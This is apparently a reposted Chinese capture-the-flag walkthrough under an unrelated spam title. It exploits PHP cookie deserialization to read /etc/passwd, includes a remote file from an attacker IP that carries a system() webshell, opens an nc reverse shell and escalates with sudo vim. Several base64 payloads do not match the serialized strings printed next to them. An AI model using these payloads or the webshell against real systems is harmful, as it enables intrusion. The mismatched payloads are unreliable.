当前位置: 首页 > news >正文

百度校招做网站建设优化的电话话术

百度校招,做网站建设优化的电话话术,做响应式网站公司,商城系统开发目录 一、信息收集 1.探测主机存活(目标主机IP地址) 2.访问web服务 3.后台目录和端口扫描 4.解析bak.zip源码 二、漏洞利用 1.构造payload 2.通过bp的repeater模块 3.get shell 4.获取反弹shell 三、提升权限 1. 查看系统版本,内核…

目录

一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

3.后台目录和端口扫描

4.解析bak.zip源码

二、漏洞利用

1.构造payload

2.通过bp的repeater模块

3.get shell

4.获取反弹shell

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功


一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,在首页中并未有任何有价值的信息

3.后台目录和端口扫描

开启80和22端口说明可能用到远程连接。

经过扫描后我们我们尝试访问扫描结果对应的目录,结果发现在/backup目录下存在压缩包

4.解析bak.zip源码

下载解压后,存有三个php文件

整理思路: 首次访问网站后,后台会创建一个user对象,并且内部又为wel变量创建welcome对象,同时进行序列化base64编码存入cookie,我们抓一下页面的包,发现cookie。

这里的cookie便是后台通过base64编码后的结果

使用base64解码后得到的结果

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}7

二、漏洞利用

1.构造payload

由于空格在url地址中无法识别,所以将所有空格转为8进制\x00 同时由于文件包含参数为type_log,所以内容应为文件路径

O:4:“User”:2:{s:10:“\x00User\x00name”;s:3:“sk4”;s:9:“\x00User\x00wel”;O:3:“Log”:1:{s:8:“type_log”;s:11:“/etc/passwd”}}

编码后的payload如下:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

2.通过bp的repeater模块

成功访问到信息,可以看到sk4用户属性为/bin/bash

3.get shell

1.构造序列化语句上传shell

<?php @system($_GET['cmd']);?>

2.然后构造payload:

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}}

然后进行序列化和base64编码执行。代码如下:

<?phpclass Log {private $type_log = "http://192.168.3.222/c.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

64编码后的payload:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjU2LjEvc2hlbGwudHh0Ijt9fQ==

3.用burpsuite上传

成功执行一句话木马

4.获取反弹shell

直接使用nc工具来尝试回弹一个shell

在kali中使用nc监听7777端口等待靶机访问

成功回弹!!

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功

http://www.yayakq.cn/news/303911/

相关文章:

  • 网站开发相关文献Ul设计网站
  • 作品集展示的网站源码注册了网站之后怎么设计
  • 企业营销网站建设费用网站算信息化建设
  • 石油网站编辑怎么做dw做的网站设计
  • 企业网站托管排版设计制作企业邮箱怎么申请的
  • 如何做网页公证成都网站搜索排名优化公司
  • 南宁网站制作网络公司购物网站功能模块图
  • 个人网站工商备案服装企业网站策划书
  • 红酒企业网站建设河南省建设厅人员名单
  • 代做一个网站多少钱月熊志网站
  • 宜昌做网站公司有哪些方法建站的目的
  • 网站开发哪里便宜做彩票网站犯法吗
  • 福州网站设计大概多少钱2022楼市最新消息
  • 潍坊网站建设价格低免费软件app下载安装
  • 上虞做网站自己制作个人网站
  • 如何把图片做网站背景免费个人简历word可编辑
  • vue.js 可以做网站吗wordpress下载站模板
  • 专门做包装的网站济南电视台鲁中频道莱芜新闻
  • 江门移动网站建设多少钱建设银行杭州招聘网站
  • js网站特效中山 网站建设开发
  • 名校长工作室网站建设做传奇网站
  • 校园交友的网站建设seo工具不包括
  • wordpress网站专题北关网站制作
  • 微信个人商城网站模板做网站哪些软件
  • 企业网站模板源码资源下载邢台123今天最新招聘
  • 建一个自己的网站价格郑州app开发公司排名
  • asp.net网站制作视频教程向wordpress提交插件
  • 专门做酒的网站淘宝网站怎样建
  • 优化文章对网站的重要性网站上的专题 怎么设计
  • 建设营销网站的四个步骤专业开发网站多少钱